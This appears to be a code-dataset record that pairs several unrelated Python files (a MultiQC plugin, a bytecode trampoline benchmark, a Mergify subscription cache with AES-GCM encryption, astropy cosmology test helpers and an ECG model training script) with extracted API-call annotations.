[((298, 325), 'numpy.zeros_like', 'np.zeros_like', (['img[:, :, 0]'], {}), '(img[:, :, 0])\n', (311, 325), True, 'import numpy as np\n'), ((1314, 1341), 'numpy.zeros_like', 'np.zeros_like', (['img[:, :, 0]'], {}), '(img[:, :, 0])\n', (1327, 1341), True, 'import numpy as np\n'), ((2660, 2696), 'numpy.sqrt', 'np.sqrt', (['(x_pixel ** 2 + y_pixel ** 2)'], {}), '(x_pixel ** 2 + y_pixel ** 2)\n', (2667, 2696), True, 'import numpy as np\n'), ((2762, 2790), 'numpy.arctan2', 'np.arctan2', (['y_pixel', 'x_pixel'], {}), '(y_pixel, x_pixel)\n', (2772, 2790), True, 'import numpy as np\n'), ((4916, 4953), 'cv2.getPerspectiveTransform', 'cv2.getPerspectiveTransform', (['src', 'dst'], {}), '(src, dst)\n', (4943, 4953), False, 'import cv2\n'), ((4967, 5024), 'cv2.warpPerspective', 'cv2.warpPerspective', (['img', 'M', '(img.shape[1], img.shape[0])'], {}), '(img, M, (img.shape[1], img.shape[0]))\n', (4986, 5024), False, 'import cv2\n'), ((5412, 5469), 'numpy.float32', 'np.float32', (['[[14, 140], [301, 140], [200, 96], [118, 96]]'], {}), '([[14, 140], [301, 140], [200, 96], [118, 96]])\n', (5422, 5469), True, 'import numpy as np\n'), ((5527, 5828), 'numpy.float32', 'np.float32', (['[[img.shape[1] / 2 - dst_size, img.shape[0] - bottom_offset], [img.shape[1] /\n 2 + dst_size, img.shape[0] - bottom_offset], [img.shape[1] / 2 +\n dst_size, img.shape[0] - 2 * dst_size - bottom_offset], [img.shape[1] /\n 2 - dst_size, img.shape[0] - 2 * dst_size - bottom_offset]]'], {}), '([[img.shape[1] / 2 - dst_size, img.shape[0] - bottom_offset], [\n img.shape[1] / 2 + dst_size, img.shape[0] - bottom_offset], [img.shape[\n 1] / 2 + dst_size, img.shape[0] - 2 * dst_size - bottom_offset], [img.\n shape[1] / 2 - dst_size, img.shape[0] - 2 * dst_size - bottom_offset]])\n', (5537, 5828), True, 'import numpy as np\n'), ((7211, 7275), 'numpy.clip', 'np.clip', (['(Rover.worldmap[y_pix_world, x_pix_world, 2] + 1)', '(0)', '(255)'], {}), '(Rover.worldmap[y_pix_world, x_pix_world, 2] + 1, 0, 255)\n', (7218, 7275), True, 'import numpy as np\n'), ((7538, 7610), 'numpy.clip', 'np.clip', (['(Rover.worldmap[y_pix_world_obs, x_pix_world_obs, 0] + 1)', '(0)', '(255)'], {}), '(Rover.worldmap[y_pix_world_obs, x_pix_world_obs, 0] + 1, 0, 255)\n', (7545, 7610), True, 'import numpy as np\n'), ((7876, 7950), 'numpy.clip', 'np.clip', (['(Rover.worldmap[y_pix_world_rock, x_pix_world_rock, 1] + 1)', '(0)', '(255)'], {}), '(Rover.worldmap[y_pix_world_rock, x_pix_world_rock, 1] + 1, 0, 255)\n', (7883, 7950), True, 'import numpy as np\n'), ((3942, 3960), 'numpy.int_', 'np.int_', (['xpix_tran'], {}), '(xpix_tran)\n', (3949, 3960), True, 'import numpy as np\n'), ((4007, 4025), 'numpy.int_', 'np.int_', (['ypix_tran'], {}), '(ypix_tran)\n', (4014, 4025), True, 'import numpy as np\n'), ((4225, 4248), 'numpy.arange', 'np.arange', (['global_scale'], {}), '(global_scale)\n', (4234, 4248), True, 'import numpy as np\n'), ((4583, 4601), 'numpy.int_', 'np.int_', (['xpix_tran'], {}), '(xpix_tran)\n', (4590, 4601), True, 'import numpy as np\n'), ((4648, 4666), 'numpy.int_', 'np.int_', (['ypix_tran'], {}), '(ypix_tran)\n', (4655, 4666), True, 'import numpy as np\n'), ((8768, 8795), 'numpy.mean', 'np.mean', (['weights_sub_global'], {}), '(weights_sub_global)\n', (8775, 8795), True, 'import numpy as np\n'), ((2998, 3013), 'numpy.cos', 'np.cos', (['yaw_rad'], {}), '(yaw_rad)\n', (3004, 3013), True, 'import numpy as np\n'), ((3025, 3040), 'numpy.sin', 'np.sin', (['yaw_rad'], {}), '(yaw_rad)\n', (3031, 3040), True, 'import numpy as np\n'), ((3098, 3113), 'numpy.sin', 'np.sin', (['yaw_rad'], {}), '(yaw_rad)\n', (3104, 3113), True, 'import numpy as np\n'), ((3125, 3140), 'numpy.cos', 'np.cos', (['yaw_rad'], {}), '(yaw_rad)\n', (3131, 3140), True, 'import numpy as np\n'), ((4284, 4307), 'numpy.arange', 'np.arange', (['global_scale'], {}), '(global_scale)\n', (4293, 4307), True, 'import numpy as np\n'), ((8647, 8706), 'numpy.abs', 'np.abs', (['(weights_sub_global[:, 0] + weights_sub_global[:, 2])'], {}), '(weights_sub_global[:, 0] + weights_sub_global[:, 2])\n', (8653, 8706), True, 'import numpy as np\n'), ((8843, 8870), 'numpy.mean', 'np.mean', (['weights_sub_global'], {}), '(weights_sub_global)\n', (8850, 8870), True, 'import numpy as np\n'), ((9006, 9032), 'numpy.sum', 'np.sum', (['weights_sub_global'], {}), '(weights_sub_global)\n', (9012, 9032), True, 'import numpy as np\n'), ((8955, 9005), 'numpy.multiply', 'np.multiply', (['angles_sub_global', 'weights_sub_global'], {}), '(angles_sub_global, weights_sub_global)\n', (8966, 9005), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
"""
NPMExtraMetrics module
"""
from __future__ import print_function
import logging
from multiqc.utils import config
from multiqc.modules.base_module import BaseMultiqcModule
from . import npm_picard_QualityYieldMetrics
from . import npm_samtools_stats_bq
from . import npm_bcftools_gtcheck
from . import npm_sg10k_cov_062017
from . import npm_count_variants
from . import npm_mosdepth
log = logging.getLogger('multiqc')
class NPMExtraMetrics(BaseMultiqcModule):
def __init__(self):
# Halt execution if we've disabled the plugin
if config.kwargs.get('enable_plugin', False) is True \
or getattr(config, 'enable_plugin', False) is True:
log.info("Running with MultiQC NPM plugin")
else:
log.info("Skipping MultiQC NPM plugin as not enabled")
return None
# Initialise the parent module Class object
super(NPMExtraMetrics, self).__init__(
name='NPMExtraMetrics',
anchor='npm_extra_metrics'
)
# Call each submodule and report progress
n = dict()
n['npm_picard_QualityYieldMetrics'] = npm_picard_QualityYieldMetrics.parse_reports(self)
if n['npm_picard_QualityYieldMetrics'] > 0:
log.info("Found %d npm_picard_QualityYieldMetrics reports" % n['npm_picard_QualityYieldMetrics'])
n['npm_samtools_stats_bq'] = npm_samtools_stats_bq.parse_reports(self)
if n['npm_samtools_stats_bq'] > 0:
log.info("Found %d npm_samtools_stats_bq reports" % n['npm_samtools_stats_bq'])
n['npm_bcftools_gtcheck'] = npm_bcftools_gtcheck.parse_reports(self)
if n['npm_bcftools_gtcheck'] > 0:
log.info("Found %d npm_bcftools_gtcheck reports" % n['npm_bcftools_gtcheck'])
n['npm_sg10k_cov_062017'] = npm_sg10k_cov_062017.parse_reports(self)
if n['npm_sg10k_cov_062017'] > 0:
log.info("Found %d npm_sg10k_cov_062017 reports" % n['npm_sg10k_cov_062017'])
n['npm_count_variants'] = npm_count_variants.parse_reports(self)
if n['npm_count_variants'] > 0:
log.info("Found %d npm_count_variants reports" % n['npm_count_variants'])
n['npm_mosdepth'] = npm_mosdepth.parse_reports(self)
if n['npm_mosdepth'] > 0:
log.info("Found %d npm_mosdepth reports" % n['npm_mosdepth'])
# Exit if we didn't find anything
if sum(n.values()) == 0:
raise UserWarning
|
[
"multiqc.utils.config.kwargs.get",
"logging.getLogger"
] |
[((420, 448), 'logging.getLogger', 'logging.getLogger', (['"""multiqc"""'], {}), "('multiqc')\n", (437, 448), False, 'import logging\n'), ((584, 625), 'multiqc.utils.config.kwargs.get', 'config.kwargs.get', (['"""enable_plugin"""', '(False)'], {}), "('enable_plugin', False)\n", (601, 625), False, 'from multiqc.utils import config\n')]
|
from timeit import timeit
from sijuiacion_lang.lowering import sij, Lower
defun = sij.Defun("", "", [], "", ["argf"], [
sij.Load("argf"),
sij.Label("loop"),
sij.Unpack(2),
sij.Call(1),
sij.Unpack(2),
sij.GotoNEq("loop"),
sij.Return()
])
code, _ = Lower({}).lower("", "", 1, "", [], [], [defun, sij.Return()])
scheduler = eval(code)
print(scheduler)
def schd(f, arg):
while True:
token, a = f(arg)
if token:
return a
f, arg = a
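# Trampoline note (illustrative): schd keeps calling f(arg) and unpacking a
# (done, payload) pair; while done is falsy the payload is the next (f, arg)
# thunk, so the deep recursion of rec2 runs without growing the Python stack.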
#
#
def rec1(x):
    if x == 0:
return 0
return rec1(x - 1) + x
#
#
def rec2(x):
def apply(y):
        if x == 0:
return True, y
return False, (x + y, scheduler((x - 1, rec2)))
return True, apply
import dis
dis.show_code(scheduler)
dis.show_code(schd)
#
#
# print(scheduler((0, scheduler((500, rec2)))))
print(timeit('rec1(500)', globals=globals(), number=500))
print(
timeit('scheduler((0, scheduler((500, rec2))))',
globals=globals(),
number=500))
|
[
"sijuiacion_lang.lowering.sij.Call",
"sijuiacion_lang.lowering.sij.Return",
"sijuiacion_lang.lowering.sij.Load",
"sijuiacion_lang.lowering.sij.GotoNEq",
"sijuiacion_lang.lowering.sij.Label",
"sijuiacion_lang.lowering.Lower",
"dis.show_code",
"sijuiacion_lang.lowering.sij.Unpack"
] |
[((754, 778), 'dis.show_code', 'dis.show_code', (['scheduler'], {}), '(scheduler)\n', (767, 778), False, 'import dis\n'), ((779, 798), 'dis.show_code', 'dis.show_code', (['schd'], {}), '(schd)\n', (792, 798), False, 'import dis\n'), ((125, 141), 'sijuiacion_lang.lowering.sij.Load', 'sij.Load', (['"""argf"""'], {}), "('argf')\n", (133, 141), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((147, 164), 'sijuiacion_lang.lowering.sij.Label', 'sij.Label', (['"""loop"""'], {}), "('loop')\n", (156, 164), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((170, 183), 'sijuiacion_lang.lowering.sij.Unpack', 'sij.Unpack', (['(2)'], {}), '(2)\n', (180, 183), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((189, 200), 'sijuiacion_lang.lowering.sij.Call', 'sij.Call', (['(1)'], {}), '(1)\n', (197, 200), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((206, 219), 'sijuiacion_lang.lowering.sij.Unpack', 'sij.Unpack', (['(2)'], {}), '(2)\n', (216, 219), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((225, 244), 'sijuiacion_lang.lowering.sij.GotoNEq', 'sij.GotoNEq', (['"""loop"""'], {}), "('loop')\n", (236, 244), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((250, 262), 'sijuiacion_lang.lowering.sij.Return', 'sij.Return', ([], {}), '()\n', (260, 262), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((277, 286), 'sijuiacion_lang.lowering.Lower', 'Lower', (['{}'], {}), '({})\n', (282, 286), False, 'from sijuiacion_lang.lowering import sij, Lower\n'), ((324, 336), 'sijuiacion_lang.lowering.sij.Return', 'sij.Return', ([], {}), '()\n', (334, 336), False, 'from sijuiacion_lang.lowering import sij, Lower\n')]
|
# -*- encoding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import binascii
import json
import os
import cryptography
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import ciphers
from cryptography.hazmat.primitives import hashes
import daiquiri
import requests
from mergify_engine import config
LOG = daiquiri.getLogger(__name__)
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(config.CACHE_TOKEN_SECRET.encode())
SECRET_KEY = digest.finalize()
IV_BYTES_NEEDED = 12
BLOCK_SIZE = 16
TAG_SIZE_BYTES = BLOCK_SIZE
def _encrypt(sub):
value = json.dumps(sub).encode()
iv = os.urandom(IV_BYTES_NEEDED)
cipher = ciphers.Cipher(
ciphers.algorithms.AES(SECRET_KEY),
ciphers.modes.GCM(iv),
backend=default_backend()
)
encryptor = cipher.encryptor()
encrypted = encryptor.update(value) + encryptor.finalize()
encrypted = base64.b64encode(iv + encryptor.tag + encrypted)
return encrypted
def _decrypt(value):
try:
decrypted = base64.b64decode(value)
except binascii.Error:
LOG.error("Invalid encrypted token: invalid base64")
return
if len(decrypted) < IV_BYTES_NEEDED + TAG_SIZE_BYTES:
LOG.error("Invalid encrypted token: size check failure")
return
iv = decrypted[:IV_BYTES_NEEDED]
tag = decrypted[IV_BYTES_NEEDED: IV_BYTES_NEEDED + TAG_SIZE_BYTES]
decrypted = decrypted[IV_BYTES_NEEDED + TAG_SIZE_BYTES:]
cipher = ciphers.Cipher(
ciphers.algorithms.AES(SECRET_KEY),
ciphers.modes.GCM(iv, tag),
backend=default_backend()
)
decryptor = cipher.decryptor()
try:
decrypted = decryptor.update(decrypted) + decryptor.finalize()
except cryptography.exceptions.InvalidTag:
LOG.error("Invalid encrypted token: decryptor() failure")
return
try:
decrypted = decrypted.decode()
except UnicodeDecodeError:
LOG.error("Invalid encrypted token: decode() failure")
return
try:
return json.loads(decrypted)
except json.JSONDecodeError:
LOG.error("Invalid encrypted token: json.load() failure")
return
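# Round-trip sketch (illustrative; assumes config.CACHE_TOKEN_SECRET is set):
#   token = _encrypt({"token": None, "subscribed": False})
#   assert _decrypt(token) == {"token": None, "subscribed": False}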
def _retrieve_subscription_from_db(installation_id):
LOG.debug("Subscription not cached, retrieving it...",
install_id=installation_id)
resp = requests.get(config.SUBSCRIPTION_URL %
installation_id,
auth=(config.OAUTH_CLIENT_ID,
config.OAUTH_CLIENT_SECRET))
if resp.status_code == 404:
sub = {
"token": None,
"subscribed": False
}
elif resp.status_code == 200:
sub = resp.json()
sub["subscribed"] = sub["subscription"] is not None
sub["token"] = sub["token"]["access_token"]
del sub["subscription"]
else: # pragma: no cover
# NOTE(sileht): handle this better
resp.raise_for_status()
return sub
def _retrieve_subscription_from_cache(r, installation_id):
encrypted_sub = r.get("subscription-cache-%s" % installation_id)
if encrypted_sub:
return _decrypt(encrypted_sub)
def _save_subscription_to_cache(r, installation_id, sub):
encrypted = _encrypt(sub)
r.set("subscription-cache-%s" % installation_id, encrypted, ex=3600)
def get_subscription(r, installation_id):
sub = _retrieve_subscription_from_cache(r, installation_id)
if not sub:
sub = _retrieve_subscription_from_db(installation_id)
_save_subscription_to_cache(r, installation_id, sub)
return sub
|
[
"json.loads",
"cryptography.hazmat.primitives.hashes.SHA256",
"cryptography.hazmat.primitives.ciphers.algorithms.AES",
"base64.b64decode",
"json.dumps",
"cryptography.hazmat.primitives.ciphers.modes.GCM",
"mergify_engine.config.CACHE_TOKEN_SECRET.encode",
"base64.b64encode",
"requests.get",
"daiquiri.getLogger",
"cryptography.hazmat.backends.default_backend",
"os.urandom"
] |
[((882, 910), 'daiquiri.getLogger', 'daiquiri.getLogger', (['__name__'], {}), '(__name__)\n', (900, 910), False, 'import daiquiri\n'), ((933, 948), 'cryptography.hazmat.primitives.hashes.SHA256', 'hashes.SHA256', ([], {}), '()\n', (946, 948), False, 'from cryptography.hazmat.primitives import hashes\n'), ((991, 1025), 'mergify_engine.config.CACHE_TOKEN_SECRET.encode', 'config.CACHE_TOKEN_SECRET.encode', ([], {}), '()\n', (1023, 1025), False, 'from mergify_engine import config\n'), ((1191, 1218), 'os.urandom', 'os.urandom', (['IV_BYTES_NEEDED'], {}), '(IV_BYTES_NEEDED)\n', (1201, 1218), False, 'import os\n'), ((1477, 1525), 'base64.b64encode', 'base64.b64encode', (['(iv + encryptor.tag + encrypted)'], {}), '(iv + encryptor.tag + encrypted)\n', (1493, 1525), False, 'import base64\n'), ((2913, 3032), 'requests.get', 'requests.get', (['(config.SUBSCRIPTION_URL % installation_id)'], {'auth': '(config.OAUTH_CLIENT_ID, config.OAUTH_CLIENT_SECRET)'}), '(config.SUBSCRIPTION_URL % installation_id, auth=(config.\n OAUTH_CLIENT_ID, config.OAUTH_CLIENT_SECRET))\n', (2925, 3032), False, 'import requests\n'), ((958, 975), 'cryptography.hazmat.backends.default_backend', 'default_backend', ([], {}), '()\n', (973, 975), False, 'from cryptography.hazmat.backends import default_backend\n'), ((1256, 1290), 'cryptography.hazmat.primitives.ciphers.algorithms.AES', 'ciphers.algorithms.AES', (['SECRET_KEY'], {}), '(SECRET_KEY)\n', (1278, 1290), False, 'from cryptography.hazmat.primitives import ciphers\n'), ((1300, 1321), 'cryptography.hazmat.primitives.ciphers.modes.GCM', 'ciphers.modes.GCM', (['iv'], {}), '(iv)\n', (1317, 1321), False, 'from cryptography.hazmat.primitives import ciphers\n'), ((1599, 1622), 'base64.b64decode', 'base64.b64decode', (['value'], {}), '(value)\n', (1615, 1622), False, 'import base64\n'), ((2072, 2106), 'cryptography.hazmat.primitives.ciphers.algorithms.AES', 'ciphers.algorithms.AES', (['SECRET_KEY'], {}), '(SECRET_KEY)\n', (2094, 2106), False, 'from cryptography.hazmat.primitives import ciphers\n'), ((2116, 2142), 'cryptography.hazmat.primitives.ciphers.modes.GCM', 'ciphers.modes.GCM', (['iv', 'tag'], {}), '(iv, tag)\n', (2133, 2142), False, 'from cryptography.hazmat.primitives import ciphers\n'), ((2610, 2631), 'json.loads', 'json.loads', (['decrypted'], {}), '(decrypted)\n', (2620, 2631), False, 'import json\n'), ((1157, 1172), 'json.dumps', 'json.dumps', (['sub'], {}), '(sub)\n', (1167, 1172), False, 'import json\n'), ((1339, 1356), 'cryptography.hazmat.backends.default_backend', 'default_backend', ([], {}), '()\n', (1354, 1356), False, 'from cryptography.hazmat.backends import default_backend\n'), ((2160, 2177), 'cryptography.hazmat.backends.default_backend', 'default_backend', ([], {}), '()\n', (2175, 2177), False, 'from cryptography.hazmat.backends import default_backend\n')]
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Configure the tests for :mod:`astropy.cosmology`."""
##############################################################################
# IMPORTS
# STDLIB
import inspect
import json
import os
# THIRD-PARTY
import pytest
# LOCAL
import astropy.cosmology.units as cu
import astropy.units as u
from astropy.cosmology import core
from astropy.cosmology.core import Cosmology
from astropy.tests.helper import pickle_protocol
###############################################################################
# FUNCTIONS
def get_redshift_methods(cosmology, allow_private=True, allow_z2=True):
"""Get redshift methods from a cosmology.
Parameters
----------
cosmology : |Cosmology| class or instance
Returns
-------
set[str]
"""
methods = set()
for n in dir(cosmology):
try: # get method, some will error on ABCs
m = getattr(cosmology, n)
except NotImplementedError:
continue
# Add anything callable, optionally excluding private methods.
if callable(m) and (not n.startswith('_') or allow_private):
methods.add(n)
# Sieve out incompatible methods.
# The index to check for redshift depends on whether cosmology is a class
# or instance and does/doesn't include 'self'.
iz1 = 1 if inspect.isclass(cosmology) else 0
for n in tuple(methods):
try:
sig = inspect.signature(getattr(cosmology, n))
except ValueError: # Remove non-introspectable methods.
methods.discard(n)
continue
else:
params = list(sig.parameters.keys())
# Remove non redshift methods:
if len(params) <= iz1: # Check there are enough arguments.
methods.discard(n)
elif len(params) >= iz1 + 1 and not params[iz1].startswith("z"): # First non-self arg is z.
methods.discard(n)
# If methods with 2 z args are not allowed, the following arg is checked.
elif not allow_z2 and (len(params) >= iz1 + 2) and params[iz1 + 1].startswith("z"):
methods.discard(n)
return methods
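# Usage sketch (illustrative): collect the public single-redshift methods of
# the base class, e.g.
#   methods = get_redshift_methods(Cosmology, allow_private=False, allow_z2=False)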
def read_json(filename, **kwargs):
"""Read JSON.
Parameters
----------
filename : str
**kwargs
Keyword arguments into :meth:`~astropy.cosmology.Cosmology.from_format`
Returns
-------
`~astropy.cosmology.Cosmology` instance
"""
# read
if isinstance(filename, (str, bytes, os.PathLike)):
with open(filename, "r") as file:
data = file.read()
else: # file-like : this also handles errors in dumping
data = filename.read()
mapping = json.loads(data) # parse json mappable to dict
# deserialize Quantity
with u.add_enabled_units(cu.redshift):
for k, v in mapping.items():
if isinstance(v, dict) and "value" in v and "unit" in v:
mapping[k] = u.Quantity(v["value"], v["unit"])
for k, v in mapping.get("meta", {}).items(): # also the metadata
if isinstance(v, dict) and "value" in v and "unit" in v:
mapping["meta"][k] = u.Quantity(v["value"], v["unit"])
return Cosmology.from_format(mapping, **kwargs)
def write_json(cosmology, file, *, overwrite=False):
"""Write Cosmology to JSON.
Parameters
----------
cosmology : `astropy.cosmology.Cosmology` subclass instance
file : path-like or file-like
overwrite : bool (optional, keyword-only)
"""
data = cosmology.to_format("mapping") # start by turning into dict
data["cosmology"] = data["cosmology"].__qualname__
# serialize Quantity
for k, v in data.items():
if isinstance(v, u.Quantity):
data[k] = {"value": v.value.tolist(), "unit": str(v.unit)}
for k, v in data.get("meta", {}).items(): # also serialize the metadata
if isinstance(v, u.Quantity):
data["meta"][k] = {"value": v.value.tolist(), "unit": str(v.unit)}
# check that file exists and whether to overwrite.
if os.path.exists(file) and not overwrite:
raise IOError(f"{file} exists. Set 'overwrite' to write over.")
with open(file, "w") as write_file:
json.dump(data, write_file)
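# Round-trip sketch (illustrative): write_json(cosmo, "cosmo.json") followed by
# read_json("cosmo.json") rebuilds the cosmology, with Quantity fields passing
# through the {"value": ..., "unit": ...} mapping used above.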
def json_identify(origin, filepath, fileobj, *args, **kwargs):
return filepath is not None and filepath.endswith(".json")
###############################################################################
# FIXTURES
@pytest.fixture
def clean_registry():
# TODO! with monkeypatch instead for thread safety.
ORIGINAL_COSMOLOGY_CLASSES = core._COSMOLOGY_CLASSES
core._COSMOLOGY_CLASSES = {} # set as empty dict
yield core._COSMOLOGY_CLASSES
core._COSMOLOGY_CLASSES = ORIGINAL_COSMOLOGY_CLASSES
|
[
"json.dump",
"astropy.units.Quantity",
"json.loads",
"inspect.isclass",
"os.path.exists",
"astropy.units.add_enabled_units",
"astropy.cosmology.core.Cosmology.from_format"
] |
[((2705, 2721), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (2715, 2721), False, 'import json\n'), ((3219, 3259), 'astropy.cosmology.core.Cosmology.from_format', 'Cosmology.from_format', (['mapping'], {}), '(mapping, **kwargs)\n', (3240, 3259), False, 'from astropy.cosmology.core import Cosmology\n'), ((1371, 1397), 'inspect.isclass', 'inspect.isclass', (['cosmology'], {}), '(cosmology)\n', (1386, 1397), False, 'import inspect\n'), ((2790, 2822), 'astropy.units.add_enabled_units', 'u.add_enabled_units', (['cu.redshift'], {}), '(cu.redshift)\n', (2809, 2822), True, 'import astropy.units as u\n'), ((4079, 4099), 'os.path.exists', 'os.path.exists', (['file'], {}), '(file)\n', (4093, 4099), False, 'import os\n'), ((4239, 4266), 'json.dump', 'json.dump', (['data', 'write_file'], {}), '(data, write_file)\n', (4248, 4266), False, 'import json\n'), ((2959, 2992), 'astropy.units.Quantity', 'u.Quantity', (["v['value']", "v['unit']"], {}), "(v['value'], v['unit'])\n", (2969, 2992), True, 'import astropy.units as u\n'), ((3173, 3206), 'astropy.units.Quantity', 'u.Quantity', (["v['value']", "v['unit']"], {}), "(v['value'], v['unit'])\n", (3183, 3206), True, 'import astropy.units as u\n')]
|
import json
from urllib.parse import quote
from sdk_lpl.config import Config
from sdk_lpl.models.InfoCompteModel import InformationCompteModel
from sdk_lpl.utils.crypt import Crypt
def generate_url(mail, username, guid):
"""
    Generate the partner sign-up URL.
    Embed this URL in an <a> tag to redirect the logged-in user to an LPL platform sign-up page with the mail and username fields already filled in
:param mail:
:param username:
:param guid:
:return:
"""
model = InformationCompteModel(mail, username, guid)
json_val = json.dumps(model.__dict__)
crypt = Crypt(Config.aes_key, Config.iv)
return "http://www.lapresselibre.fr/inscription-partenaire?user={}&partId={}".format(
quote(crypt.aes_encrypt(json_val)), Config.partenaire_id)
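# Usage sketch (hypothetical values):
#   url = generate_url("user@example.com", "pseudo", "guid-123")
#   # -> "http://www.lapresselibre.fr/inscription-partenaire?user=...&partId=..."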
|
[
"sdk_lpl.utils.crypt.Crypt",
"sdk_lpl.models.InfoCompteModel.InformationCompteModel",
"json.dumps"
] |
[((545, 589), 'sdk_lpl.models.InfoCompteModel.InformationCompteModel', 'InformationCompteModel', (['mail', 'username', 'guid'], {}), '(mail, username, guid)\n', (567, 589), False, 'from sdk_lpl.models.InfoCompteModel import InformationCompteModel\n'), ((605, 631), 'json.dumps', 'json.dumps', (['model.__dict__'], {}), '(model.__dict__)\n', (615, 631), False, 'import json\n'), ((644, 676), 'sdk_lpl.utils.crypt.Crypt', 'Crypt', (['Config.aes_key', 'Config.iv'], {}), '(Config.aes_key, Config.iv)\n', (649, 676), False, 'from sdk_lpl.utils.crypt import Crypt\n')]
|
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.callbacks import (ModelCheckpoint, TensorBoard, ReduceLROnPlateau,
CSVLogger, EarlyStopping)
from model import get_model
import argparse
from datasets import ECGSequence, PublicECGSequence
if __name__ == "__main__":
# Get data and train
parser = argparse.ArgumentParser(description='Train neural network.')
# parser.add_argument('path_to_hdf5', type=str,
# help='path to hdf5 file containing tracings')
# parser.add_argument('path_to_csv', type=str,
# help='path to csv file containing annotations')
# parser.add_argument('--val_split', type=float, default=0.02,
# help='number between 0 and 1 determining how much of'
# ' the data is to be used for validation. The remaining '
# 'is used for validation. Default: 0.02')
# parser.add_argument('--dataset_name', type=str, default='tracings',
# help='name of the hdf5 dataset containing tracings')
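    # NOTE: the parser is re-created below, discarding the commented-out
    # hdf5-based interface above in favour of the csv-based one.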
parser = argparse.ArgumentParser(description='Train neural network.')
parser.add_argument('--path_to_train', type=str, help='path to csv file containing training data')
parser.add_argument('--path_to_ecg', type=str, help='path to folder containing csv of ecg')
parser.add_argument('--val_split', type=float, default=0.2,
help='number between 0 and 1 determining how much of'
' the data is to be used for validation. The remaining '
'is used for validation. Default: 0.2')
# parser.add_argument('--dataset_name', type=str, default='tracings',
# help='name of the hdf5 dataset containing tracings')
args = parser.parse_args()
# Optimization settings
loss = 'binary_crossentropy'
lr = 0.001
batch_size = 64
opt = Adam(lr)
callbacks = [ReduceLROnPlateau(monitor='val_loss',
factor=0.1,
patience=7,
min_lr=lr / 100),
EarlyStopping(patience=9, # Patience should be larger than the one in ReduceLROnPlateau
min_delta=0.00001)]
# train_seq, valid_seq = ECGSequence.get_train_and_val(
# args.path_to_hdf5, args.dataset_name, args.path_to_csv, batch_size, args.val_split)
train_seq, valid_seq = PublicECGSequence.get_train_and_val(
args.path_to_train, args.path_to_ecg, batch_size, args.val_split)
# If you are continuing an interrupted section, uncomment line bellow:
# model = keras.models.load_model(PATH_TO_PREV_MODEL, compile=False)
model = get_model(train_seq.n_classes)
model.compile(loss=loss, optimizer=opt)
# Create log
callbacks += [TensorBoard(log_dir='./logs', write_graph=False),
CSVLogger('training.log', append=False)] # Change append to true if continuing training
# Save the BEST and LAST model
callbacks += [ModelCheckpoint('./backup_model_last.hdf5'),
ModelCheckpoint('./backup_model_best.hdf5', save_best_only=True)]
# Train neural network
history = model.fit(train_seq,
epochs=70,
initial_epoch=0, # If you are continuing a interrupted section change here
callbacks=callbacks,
validation_data=valid_seq,
verbose=1)
# Save final result
model.save("./final_model.hdf5")
|
[
"model.get_model",
"argparse.ArgumentParser",
"tensorflow.keras.callbacks.ReduceLROnPlateau",
"tensorflow.keras.callbacks.ModelCheckpoint",
"tensorflow.keras.callbacks.CSVLogger",
"datasets.PublicECGSequence.get_train_and_val",
"tensorflow.keras.optimizers.Adam",
"tensorflow.keras.callbacks.TensorBoard",
"tensorflow.keras.callbacks.EarlyStopping"
] |
[((362, 422), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train neural network."""'}), "(description='Train neural network.')\n", (385, 422), False, 'import argparse\n'), ((1146, 1206), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train neural network."""'}), "(description='Train neural network.')\n", (1169, 1206), False, 'import argparse\n'), ((1994, 2002), 'tensorflow.keras.optimizers.Adam', 'Adam', (['lr'], {}), '(lr)\n', (1998, 2002), False, 'from tensorflow.keras.optimizers import Adam\n'), ((2545, 2650), 'datasets.PublicECGSequence.get_train_and_val', 'PublicECGSequence.get_train_and_val', (['args.path_to_train', 'args.path_to_ecg', 'batch_size', 'args.val_split'], {}), '(args.path_to_train, args.path_to_ecg,\n batch_size, args.val_split)\n', (2580, 2650), False, 'from datasets import ECGSequence, PublicECGSequence\n'), ((2819, 2849), 'model.get_model', 'get_model', (['train_seq.n_classes'], {}), '(train_seq.n_classes)\n', (2828, 2849), False, 'from model import get_model\n'), ((2020, 2098), 'tensorflow.keras.callbacks.ReduceLROnPlateau', 'ReduceLROnPlateau', ([], {'monitor': '"""val_loss"""', 'factor': '(0.1)', 'patience': '(7)', 'min_lr': '(lr / 100)'}), "(monitor='val_loss', factor=0.1, patience=7, min_lr=lr / 100)\n", (2037, 2098), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((2222, 2264), 'tensorflow.keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'patience': '(9)', 'min_delta': '(1e-05)'}), '(patience=9, min_delta=1e-05)\n', (2235, 2264), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((2929, 2977), 'tensorflow.keras.callbacks.TensorBoard', 'TensorBoard', ([], {'log_dir': '"""./logs"""', 'write_graph': '(False)'}), "(log_dir='./logs', write_graph=False)\n", (2940, 2977), False, 'from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, CSVLogger, EarlyStopping\n'), ((2997, 3036), 'tensorflow.keras.callbacks.CSVLogger', 'CSVLogger', (['"""training.log"""'], {'append': '(False)'}), "('training.log', append=False)\n", (3006, 3036), False, 'from tensorflow.keras.callbacks import 